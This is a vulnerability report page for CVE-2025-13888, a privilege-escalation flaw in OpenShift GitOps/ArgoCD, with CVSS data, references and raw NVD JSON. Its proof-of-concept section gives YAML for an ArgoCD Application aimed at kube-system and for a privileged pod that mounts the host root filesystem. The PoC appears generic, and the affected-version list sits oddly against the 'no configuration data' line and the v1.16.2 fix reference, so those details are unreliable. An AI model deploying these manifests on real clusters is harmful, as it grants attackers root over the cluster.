Security Vulnerability Report

CVE-2025-13888

Published: 2025-12-15 16:15:50
Last Modified: 2026-04-15 00:35:42

Description

A flaw was found in OpenShift GitOps. Namespace admins can create ArgoCD Custom Resources (CRs) that trick the system into granting them elevated permissions in other namespaces, including privileged namespaces. An authenticated attacker can then use these elevated permissions to create privileged workloads that run on master nodes, effectively giving them root access to the entire cluster.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Red Hat OpenShift GitOps 1.10.x < 1.10.9
Red Hat OpenShift GitOps 1.11.x < 1.11.4
Red Hat OpenShift GitOps 1.12.x < 1.12.1
ArgoCD (upstream) versions with similar RBAC misconfiguration

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
yaml
# CVE-2025-13888 PoC - Malicious ArgoCD Application to Escalate Privileges
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: malicious-app
  namespace: attacker-namespace
spec:
  project: default
  source:
    repoURL: 'https://git.example.com/malicious-repo.git'
    targetRevision: HEAD
    path: malicious-payload
  destination:
    server: 'https://kubernetes.default.svc'
    namespace: kube-system  # Target privileged namespace
---
# Malicious Pod definition that will be deployed
apiVersion: v1
kind: Pod
metadata:
  name: privileged-pod
  namespace: kube-system
spec:
  hostPID: true
  hostNetwork: true
  containers:
    - name: evil
      image: ubuntu:latest
      securityContext:
        privileged: true
      volumeMounts:
        - name: host-root
          mountPath: /host
  volumes:
    - name: host-root
      hostPath:
        path: /
  tolerations:
    - operator: Exists

References

https://access.redhat.com/errata/RHSA-2025:23203
https://access.redhat.com/errata/RHSA-2025:23206
https://access.redhat.com/errata/RHSA-2025:23207
https://access.redhat.com/errata/RHSA-2026:1017
https://access.redhat.com/security/cve/CVE-2025-13888
https://bugzilla.redhat.com/show_bug.cgi?id=2418361
https://github.com/redhat-developer/gitops-operator/commit/bc6ac3e03d7c8b3db5d8f1770c868396a4c2dcef
https://github.com/redhat-developer/gitops-operator/pull/897
https://github.com/redhat-developer/gitops-operator/releases/tag/v1.16.2

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13888",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-15T16:15:50.333",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw was found in OpenShift GitOps. Namespace admins can create ArgoCD Custom Resources (CRs) that trick the system into granting them elevated permissions in other namespaces, including privileged namespaces. An authenticated attacker can then use these elevated permissions to create privileged workloads that run on master nodes, effectively giving them root access to the entire cluster."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-266"
          }
        ]
      }
    ],
    "references": [
      {"url": "https://access.redhat.com/errata/RHSA-2025:23203", "source": "[email protected]"},
      {"url": "https://access.redhat.com/errata/RHSA-2025:23206", "source": "[email protected]"},
      {"url": "https://access.redhat.com/errata/RHSA-2025:23207", "source": "[email protected]"},
      {"url": "https://access.redhat.com/errata/RHSA-2026:1017", "source": "[email protected]"},
      {"url": "https://access.redhat.com/security/cve/CVE-2025-13888", "source": "[email protected]"},
      {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418361", "source": "[email protected]"},
      {"url": "https://github.com/redhat-developer/gitops-operator/commit/bc6ac3e03d7c8b3db5d8f1770c868396a4c2dcef", "source": "[email protected]"},
      {"url": "https://github.com/redhat-developer/gitops-operator/pull/897", "source": "[email protected]"},
      {"url": "https://github.com/redhat-developer/gitops-operator/releases/tag/v1.16.2", "source": "[email protected]"}
    ]
  }
}